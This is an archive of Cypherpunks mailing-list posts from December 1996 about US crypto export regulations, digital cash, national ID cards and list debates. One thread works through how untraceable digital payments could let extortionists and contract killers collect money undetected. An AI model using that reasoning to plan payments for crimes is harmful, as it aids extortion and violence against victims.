On the forfeiture issue, I'm more and more convinced "deal making" is a
basic evil in our judicial system. While the argument is valid that it
reduces courtroom crowding (and maybe prison crowding), it also makes
things too easy for the government side to file serious charges and then
"bargain" for a compromise. "Civil forfeiture" is a Damoclean sword hanging
over the heads of citizens.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 29 Dec 1996 17:12:01 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <v03007800aeec96b09112@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.961229170036.12732A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 29 Dec 1996, Timothy C. May wrote:

> Unlike Sandy, I'm not a great believer in multi-year bets as an
> epistemological tool....

Tim has misstated my belief.  I do think that short- or long-term
bets fulfill a purpose, but it is not an epistemological one.
(Tim, are you thinking of Robin or Nick?)  The purpose it serves
is to make pontificators more cautious in the pontifications.  
It's easy to gas on about subjects in which you have no economic
stake; we all do that at times.  The possiblity of financial loss
or reward, however, encourages temperance.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 17:08:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regs outlaw financing non-US development
In-Reply-To: <3.0.32.19961228225731.006b3080@netcom13.netcom.com>
Message-ID: <v03007801aeecc5d07561@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


This fascist move by the U.S. government is a huge threat to our liberty.
It may be time to simply give up on communicating with these assholes and
give them the treatment they have earned.

At 10:57 PM -0800 12/28/96, Lucky Green wrote:

>Finally, to the big one:

And this a very big one indeed. Not only does it probably put organizations
like C2 out of business, at least in terms of supporting the development of
things like the South African and British Web products, but it also may
mean the *Cypherpunks list itself*, and some of its members, are ipso facto
in violation of this "giving comfort to the enemy" (to paraphrase) language!

>>Sec. 736.2  General prohibitions and determination of applicability.
>>
>>* * * * *
>>    (7) General Prohibition Seven--Support of Certain Activities by
>>U.S. persons--(i) Support of Proliferation Activities (U.S. Person
>>Proliferation Activity). If you are a U.S. Person as that term is
>>defined in Sec. 744.6(c) of the EAR, you may not engage in any
>>activities prohibited by Sec. 744.6 (a) or (b) of the EAR which
>>prohibits the performance, without a license from BXA, of certain
>>financing, contracting, service, support, transportation, freight
>>forwarding, or employment that you know will assist in certain
>>proliferation activities described further in part 744 of the EAR.
>>There are no License Exceptions to this General Prohibition Seven in
>>part 740 of the EAR unless specifically authorized in that part.

This may mean, subject to the usual legal system review (a scapegoat is
targetted, a court case is filed, several years of Zimmermann limbo follow,
etc.), that members of this list may be construed to be engaging in
"certain financing, contracting, service, support, transportation, freight
forwarding, or employment that you know will assist in certain
proliferation activities described further in part 744 of the EAR."

Certainly "support" and "service" of these products. Is giving a user
advice on "Stronghold" now to be a felony? How about PGP, which certainly
has not received export approval? And so on.

This very list advocates violation of the ITARs in various ways (I speak of
"the list" as a person in the sense of the consensus of the list...there
may not be unanimity, but the consensus of the vocal members of the list is
obvious).


It may be time for us to go underground. It may be time to take much, much,
much, much more extreme steps. This fascism is unacceptable.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 17:35:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Betting and Truth
In-Reply-To: <v03007800aeec96b09112@[207.167.93.63]>
Message-ID: <v03007800aeeccd02263a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:07 PM -0800 12/29/96, Sandy Sandfort wrote:

>On Sun, 29 Dec 1996, Timothy C. May wrote:
>
>> Unlike Sandy, I'm not a great believer in multi-year bets as an
>> epistemological tool....
>
>Tim has misstated my belief.  I do think that short- or long-term
>bets fulfill a purpose, but it is not an epistemological one.
>(Tim, are you thinking of Robin or Nick?)  The purpose it serves
>is to make pontificators more cautious in the pontifications.
>It's easy to gas on about subjects in which you have no economic
>stake; we all do that at times.  The possiblity of financial loss
>or reward, however, encourages temperance.

Robin and Nick have even more faith in bets as a tool, but Sandy has, at
least on our list, been more of a user of such bets.

My problem has always been that they rarely work...in fact, of the last N
such bets which were offered (e.g., by Sandy) I can't recall a single one
which was ever even accepted, let alone which was settled. (And I recall
"bets" offered to Phill Hallam-Baker, Dimitri Vulis, etc.)

So, the thesis that pontifications are lessened is wiped out by the fact
that no such bets have ever, in my memory, been accepted. If anything,
those challenged to "put their money where their mouth is" almost uniformly
write _more_, not less.

While I accept the basic prinicple (and my income depends to a large extent
on my investments, which is surely an example of putting my money where my
mouth is, to a large extent), I question the usefullness in forums like
ours. For obvious reasons.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 29 Dec 1996 17:10:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <199612300109.SAA13864@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Hettinga wrote:

>At 6:20 pm -0500 12/29/96, Timothy C. May wrote:
>>What I think this means is a move toward a national ID card, replacing the
>>confusing (to airlines, to government agents, etc.) mishmash of state
>>driver's licenses, student ID cards, etc.
>
>"I've found that they issue a national ID card, it's time to leave..."
>           Lazarus Long, "Time Enough For Love", by Robert A. Heinlein

"After Austria and Germany, Switzerland is my favourite country. I have
spent the past 40 winters and 10 summers there. I love the place because
it's clean, beautiful, very conservative and its people mind their own
business."
             Taki, in today's _Sunday Times_(London).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 18:09:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <199612300109.SAA13864@web.azstarnet.com>
Message-ID: <v03007800aeecd57e4a90@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:09 PM -0700 12/29/96, drose@AZStarNet.com wrote:

>"After Austria and Germany, Switzerland is my favourite country. I have
>spent the past 40 winters and 10 summers there. I love the place because
>it's clean, beautiful, very conservative and its people mind their own
>business."
>             Taki, in today's _Sunday Times_(London).

Yes, the same Germany that is restricting Internet access, that proposed to
jail Compuserve executives for allowing banned material on the Net, and
that has laws  making various opinions illegal (specifically, the opinion
that the Holocaust never happened as the official version declares, or that
Aryans are superior to non-Aryans, etc.).

I enjoy all three countries, as a tourist, but I strongly doubt the "its
people mind their own business" characterization, even for Switzerland
alone (and certainly not for Germany).

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Sun, 29 Dec 1996 15:12:45 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007801aee25b84a198@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961224185445.3164A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Dec 1996, Timothy C. May wrote:

I can conceive of some ways in which only one untraceable anonymous payment
system could be controlled or halted if the aforementioned "bad things"
occurred.

> be released unless a payment is made. Physical acts have a nexus of
> detection at the act itself, the kidnapping, the bomb-planting, etc.
(...)
> "Untraceable payments" refer to payer- and payee-untraceable Chaum-style
> cash. Although for the discussions here of extortion, payee-untraceable
> (the person being paid would not be traceable is my sense of this term)
> digital cash would be sufficient; that the payment originated from XYZ
> Corporation or some account at the Bank of Albania would not stop the acts.

Indeed.  

But criminals are often a stupid and foolish lot.  Many will be caught at
the "nexus" of physical action due to their own ineptitude.  I can envision
several such instances occurring where it is publicized that these were
contract (killings,extortions,kidnappings) in which the individual was to be
paid in Bank of Albani digital cash.  

This publicity and subsequent public outrage result in many corporations and
institutions seizing the moral high ground (and a little good publicity
which could result in more revenue, of course)  and advocating/enforcing a
ban on usage of bank of Albania digital bux.  

The motivation of some of the corporations and banks is their investment in
their own competing forms of digital cash.  The Government is motivated to
support these anti-albanian actions for all the obvious reasons.  The
motivations of the exposing journalists are left as an exercise to the reader.

> How Ed receives the funds without the bits being followed through
> cyberspace is of course an easy exercise for readers here. Anonymous
> remailers with reply-block capabilities, a la Mixmaster, or, my preference,
> posting in a public place, a la the Usenet or other widely-disseminated
> message pools.

All protocols which have to be carefully followed by the Ed.  (He might use
a cutout or two to further muddy the link between him and vic.)  

> Ed takes the crypto credits and redeems them as he sees fit (after some
> unblinding stuff, of course). The redemption order is unlinkable to the
> extortion. 

True, but if Bank of Albania digital cash is not accepted as a method of
payment, what good does this do Ed?  No one will change them because they
are largely worthless.

> So, even if "Mark Twain Bank" and "Bank of America," and, indeed, the rest
> of the U.S. banking establishment eschews untraceability, the presence of
> such services anywhere in the world is enough to make the act described

> workable. And that "anywhere in the world" can, as I mentioned earlier,
> encompass the various underground banking systems already widely in use
> (Tongs, Triads, chop marks, etc. in Asia, and presumably similar systems
> elsewhere). Or it could encompass fairly conventional banks which offer

Not familiar with these systems...

> such untraceable routes for a premium. A $5,000 commission on top of the
> $25,000 transfer would make a lot of the world's banks sit up and take
> notice. And so long as they were not told what the fund transfer was all
> about--Vic is unlikely to gain anything by telling them--they have
> plausible deniability and moral comfort.

> And I surmise that the U.S. Government must have realized this. And
> realized that only by _completely quashing_ all such untraceable payments
> systems can the goals of stopping such "bad uses" be met.

Not to mention the loss of tax revenue....

> Unfortunately for them, and unfortunately for the victims of such crimes,
> no such worldwide stoppage of all such systems seems possible, even with
> draconian police state measures. There are just too many interstices for
> the bits to hide. And too much economic incentive for some persons or banks
> to offer such funds transfer methods.

Of course not.  But unless untraceable digital cash becomes a ubiquitous and
widely used form, it will not be useful for these "bad things" (or any other
purpose

As always, the key is deployment of an untraceable, anonymouse form of
digital cash now.  Wide usage is part of the key to legitimization.  Right
now the government is frantically attempting to marginalize the idea of
fully untraceable digicash with all sorts of four-horsemen publicity.  

If everybody's already using it, they'll be far less likely to switch to a
new digicash-escrow alternative.


_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 29 Dec 1996 15:34:07 -0800 (PST)
To: dcsb@ai.mit.edu
Subject: DCSB: Applying PGP To Digital Commerce
Message-ID: <v0300781baeecad5265a2@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


                 The Digital Commerce Society of Boston

                              Presents
                           Rodney Thayer
                   Sable Technology Corporation

                  "Applying PGP To Digital Commerce"



                        Tuesday, January 7, 1997
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Rodney Thayer has 20 years experience in the software development business.
For the past 10 years he has been designing, implementing, deploying, and
troubleshooting networking software.  He currently is the Principal of a
consulting firm based in Newton, Massachusetts where he is involved in the
implementation of communications products for a variety of customers,
including software vendors, major end-user organizations, and several
governmental organizations both foreign and domestic.  He also writes and
lectures on the deployment, troubleshooting, and implementation of data
communications networks.


Mr. Thayer  will talk about how PGP can be used in the business world
today, for exchange of information, digitally identifying documents, and
other commerce applications.  In this presentation, we will discuss the
application of PGP, including mechanics, the cryptographic and legal
issues, and the infrastructure requirements for it's use.

The state of the art in digital message encryption is now at the point
where it has become practical to use encrypted and digitally signed
email for digital commerce.  Recently, one scheme, PGP, has emerged
from the realm of the cyberpunk as a legitimate tool for business.
Commercial products are now available that support PGP encryption in
electronic mail and for documents and digital storage.

PGP is no longer a cult tool for computer junkies and cyberpunks.  It
is a legitimate, sound cryptographic technology that can be used,
today, for digital commerce.  As an increasingly crypto-aware business
community searches for solutions, the question of how to use message
encryption tools such as PGP becomes germaine to the business community.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, January 7, 1997 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is
$27.50. This price includes lunch, room rental, and the speaker's lunch.
;-).  The Harvard Club *does* have dress code: jackets and ties for men,
and "appropriate business attire" for women.

We will attempt to record this meeting and put it on the web in RealAudio
format at some future date

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, January 4, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Planned speakers for DCSB are:

 February   David Kaufman    1996 in Review / Predictions for 1997
 March      TBA
 April      Stewart Baker    Encryption Policy and Digital Commerce

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you
want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: SafeMail 1.0b6 e32

iQCVAwUBMsb+IvgyLN8bw6ZVAQEhRgP/b5Q5u83gIUAqJYPHp6J/BxKUrFjy/fYH
J4EqvEvjKrdWE0jcwE34ISf+qUmBS+rZZRYVMsQ8jiVa/uF8TwNNTEEe5kMUPpne
UtKvuJOEosFURwGfR4OLoYu1NsqPNuzAD40dwfQDQGVcmTqNlivhikZByE4MTNVz
bUlII450N/8=
=IS1x
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 29 Dec 1996 18:40:04 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Betting and Truth
In-Reply-To: <v03007800aeeccd02263a@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.961229182726.15540A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 29 Dec 1996, Timothy C. May wrote:

> Robin and Nick have even more faith in bets as a tool, but Sandy has, at
> least on our list, been more of a user of such bets.
> 
> My problem has always been that they rarely work...in fact, of the last N
> such bets which were offered (e.g., by Sandy) I can't recall a single one
> which was ever even accepted, let alone which was settled. (And I recall
> "bets" offered to Phill Hallam-Baker, Dimitri Vulis, etc.)

Tim's error is assuming that the offer of the bet did not "work"
merely because the bet was not taken.  All the bets I offered 
achieved effects I intended.  (Exercise for the student, and all
that.)  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 29 Dec 1996 15:38:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <5a6qc8$54r@joseph.cs.berkeley.edu>
Message-ID: <v0300781eaeecb0a22cdd@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:20 pm -0500 12/29/96, Timothy C. May wrote:
>What I think this means is a move toward a national ID card, replacing the
>confusing (to airlines, to government agents, etc.) mishmash of state
>driver's licenses, student ID cards, etc.

"I've found that they issue a national ID card, it's time to leave..."
           Lazarus Long, "Time Enough For Love", by Robert A. Heinlein

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Sun, 29 Dec 1996 18:59:32 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Cryptanalysis Trainer
Message-ID: <3.0.1.32.19961229185755.0101c6b0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:05 PM 12/29/96 -0500, John Young wrote:
>We've transcribed from PDF to ASCII the cryptanalysis 
>program in Appendix F of the US Army's Field Manual 
>FM 34-40-2, Basic Cryptanalysis, September, 1990.
>
>   http://jya.com/appf.htm

Why does it not surprise me that the code is in BASIC...

BTW, the link to the PDF does not work.  Seems the CGI they use to feed the
pdf files is broken.  (Or someone paniced and pulled it in a manner that
broke the CGI.  Would not be the first time...)

---
|   If you're not part of the solution, You're part of the precipitate.  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@ugcs.caltech.edu ((me))
Date: Sun, 29 Dec 1996 11:07:26 -0800 (PST)
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: Crypto Rules
In-Reply-To: <cypherpunks.1.5.4.32.19961229114246.0068bae0@pop.pipeline.com>
Message-ID: <5a6fgr$k2c@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Young <jya@pipeline.com> writes:

>Federal Register: December 30, 1996:
>Page 68572-68587

>Bureau of Export Administration
> 
>Encryption Items Transferred From the U.S. Munitions List 
>to the Commerce Control List

>...
>Note to paragraphs (b)(2) and (b)(3) of this section: A printed
>book or other printed material setting forth encryption source code
>is not itself subject to the EAR (see Sec. 734.3(b)(2)). However,
>notwithstanding Sec. 734.3(b)(2), encryption source code in
>electronic form or media (e.g., computer diskette or CD ROM) remains
>subject to the EAR (see Sec. 734.3(b)(3)).
>...

It's curious that they're still making this distinction.  I've got to 
wonder, if push came to shove, how they'd differentiate between, say, 
a book and a TeX document of the same book, on a CD.  Unfortunately,
the person testing this may go to prison for a long time.  I saw no
mention of prison time or fines for breaking these provisions -- I can
only assume that the teeth are buried in other Commerce regulations.
Does anyone know offhand what penalties are involved?

Also, the choice of the Commerce Department to play gatekeeper is an
interesting one, tactically.  Is the addition of a few "or import"
clauses likely?  "One small step..." as they say.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 29 Dec 1996 19:33:55 -0800 (PST)
To: David Wagner <daw@cs.berkeley.edu>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.SUN.3.95.961224080613.9113C-100000@netcom12>
Message-ID: <32C737C9.6760@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


David Wagner wrote:
> Adam Shostack  <adam@homeport.org> wrote:
> > (Speaking of which, is a state university student ID considered
> > 'government issued?'  How about a faculty or staff ID card?)

> Well, when I fly they ask for 'government issued' picture ID, and
> I present my UC Berkeley student ID for inspection.  They usually
> grumble at me, but I grumble back, and in the end they've always
> accepted it.  Try it sometime.  (And yes, my student ID is probably
> eminently forgable -- it looks very ragged and unprofessional.)
> P.S.  At JFK I had a guy tell me that they preferred to see my
> social security card!  I was completely surprised, since it has no
> picture, and (I think) says 'this card not to be used for identification
> purposes' at the bottom.  Anyone know anything about this?

This is really weird.  Maybe the person asking for SS cards is just
clueless, or from somewhere outside the U.S. I haven't seen my SS card
since 1965, shortly after it was issued.  I did three years in the U.S.
military without the card (although the military switched from RA and
US numbers to only SS numbers circa 1967-1969), and nobody has ever
insisted I have one, although I've seen a reference maybe once every few
years about the need to have one.

Real-world humans lose cards all the time, hence the need to implant
people with ID chips as soon as the chips are secure enough to use as
guaranteed permanent and unique ID.  Not my first choice, of course.

Several (or most) states threaten their drivers in the license literature
that if they're caught driving without possession of the license (even
though the person so caught has a valid license somewhere), they can be
jailed as a criminal.  If there are any cases where this has been tested,
I'd like to hear about them.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 29 Dec 1996 17:09:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptanalysis Trainer
Message-ID: <1.5.4.32.19961230010535.0069aee0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've transcribed from PDF to ASCII the cryptanalysis 
program in Appendix F of the US Army's Field Manual 
FM 34-40-2, Basic Cryptanalysis, September, 1990.

   http://jya.com/appf.htm

Manual quote: "This program gives the capability to 
encipher and decipher messages in monoalphabetic and 
polyalphabetic substitution systems, produce a variety 
of statistical data about the encrypted messages, and 
print the results or save them to disk. Because of its 
limited purpose, the program does not support on-screen 
analysis. The printed results can be used off-line to 
aid in analysis, however. The program should be 
particularly useful in preparing examples and exercises 
for training cryptanalytic techniques."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 29 Dec 1996 19:38:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <199612300338.UAA23011@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>At 6:09 PM -0700 12/29/96, drose@AZStarNet.com wrote:
>
>>"After Austria and Germany, Switzerland is my favourite country. I have
>>spent the past 40 winters and 10 summers there. I love the place because
>>it's clean, beautiful, very conservative and its people mind their own
>>business."
>>             Taki, in today's _Sunday Times_(London).
>
>Yes, the same Germany that is restricting Internet access, that proposed to
>jail Compuserve executives for allowing banned material on the Net, and
>that has laws  making various opinions illegal (specifically, the opinion
>that the Holocaust never happened as the official version declares, or that
>Aryans are superior to non-Aryans, etc.).
>
>I enjoy all three countries, as a tourist, but I strongly doubt the "its
>people mind their own business" characterization, even for Switzerland
>alone (and certainly not for Germany).

Woops. Guess that I should elided the "After Austria and Germany" clause.

Ob C-punks issues, I recall that Remo Pini, one of the Swiss on the list,
was preparing a CD-ROM crypto compilation disc. He hasn't posted in some
time, so perhaps the authorities have decided that such a project was in
fact "their business."

Seriously, I hope that Remo is able to give some information on the state of
the current Swiss crypto regs.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sun, 29 Dec 1996 21:02:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Export proposal
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <199612300502.VAA08094@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


> " Note to paragraphs (b)(2) and (b)(3) of this section: A printed
> book or other printed material setting forth encryption source code
> is not itself subject to the EAR (see Sec. 734.3(b)(2)). However,
> notwithstanding Sec. 734.3(b)(2), encryption source code in
> electronic form or media (e.g., computer diskette or CD ROM) remains
> subject to the EAR (see Sec. 734.3(b)(3))."

What this means is that the government is afraid that a ban on printed
material would be considerably more difficult to uphold in court.
It's far easier for them to argue that a floppy disk is a mechinism
presenting a clear and present danger than it would be to argue the
same for a book.

So why don't we take this debate where the Government least wants to
fight it--the realm of printed matter.  Someone should start a crypto
export business that takes crypto source code, prints it, and mails it
overseas where someone else scans the source code and deliveres it in
electronic form to a recipient.

We could some important crypto source code (for example some of the
IPv6 IPsec stuff being developed domestically), print it, export it
(legally), scan it, and then distribute it overseas.  If we repeat
this process enough, it will first cause a lot of useful crypto
software to be exported legally from the US.

Then, when the govenrment wants to stop this, they will be forced to
place a prior restraint on publication of printed technical pamphlets,
which is exactly the restriction they don't want to be stuck
defending.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 29 Dec 1996 18:38:06 -0800 (PST)
To: gt@kdn0.attnet.or.jp (Gemini Thunder)
Subject: Re: New crypto regulations
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <9612300237.AA17923@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


|> Concerning the new crypto regulations:

|> " Note to paragraphs (b)(2) and (b)(3) of this section: A printed
|> book or other printed material setting forth encryption source code
|> is not itself subject to the EAR (see Sec. 734.3(b)(2)). However,
|> notwithstanding Sec. 734.3(b)(2), encryption source code in
|> electronic form or media (e.g., computer diskette or CD ROM) remains
|> subject to the EAR (see Sec. 734.3(b)(3))."

|> This is a big question for me.  How does the fact that the same exact
|> information, when stored on magnetic media, cause it to lose its
|> freedom of press protection?

All media, all forms of expression are protected by the first amendment.
It's just that this protection is not absolute.

If the government wants to curtail freedom of speach it has to demonstrate
a compelling interest and further demonstrate that the means used are
narrowly tailored to achieve that compelling interest in the least
restricitve manner possible. Both have to be demonstrated to the courts'
satisfaction, a task quite different from (and, methinks, easier than)
demonstrating this to our own satisfaction.

These regulations explicitly say that you can transport printed information
including source code out of the country. No prior approval of any sort is
required. These regulations do not prohibit communication that requires
source code to be effective.

The government's claim is that in the interests of national security,
export of cryptography must be prevented. By limiting the policy's
applicability to media which are in, or can easily be converted to,
electronic form, the government has narrowly tailored this component
of the policy to prevent crytographic source code from appearing in
foreign computers without preventing the communication of that source code.

Cheers,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Sun, 29 Dec 1996 22:03:57 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Export proposal
In-Reply-To: <199612300502.VAA08094@mailmasher.com>
Message-ID: <199612300624.WAA01557@gabber.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> We could some important crypto source code (for example some of the
> IPv6 IPsec stuff being developed domestically), print it, export it
> (legally), scan it, and then distribute it overseas.  If we repeat
> this process enough, it will first cause a lot of useful crypto
> software to be exported legally from the US.

	PGP, Inc. is already exporting their source in this fashion.

> 
> Then, when the govenrment wants to stop this, they will be forced to
> place a prior restraint on publication of printed technical pamphlets,
> which is exactly the restriction they don't want to be stuck
> defending.
> 
	Stewart Baker has been quoted as saying that banned "easily
scanned printed texts" isn't far away. (Rebecca Vesely's Wired News
article) 
	"National Security is the root password to the Constitution."
-- I've forgotten who said this.

	We are now just one step away from non-GAK crypto being
illegal in the US. 

--
Sameer Parekh					Voice:   510-986-8770
President					FAX:     510-986-8777
C2Net 		    C2Net is having a party: http://www.c2.net/party/
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Sun, 29 Dec 1996 19:38:45 -0800 (PST)
To: gt@kdn0.attnet.or.jp (Gemini Thunder)
Subject: Re: New crypto regulations
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <199612300338.WAA00940@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Gemini Thunder sez:
> 
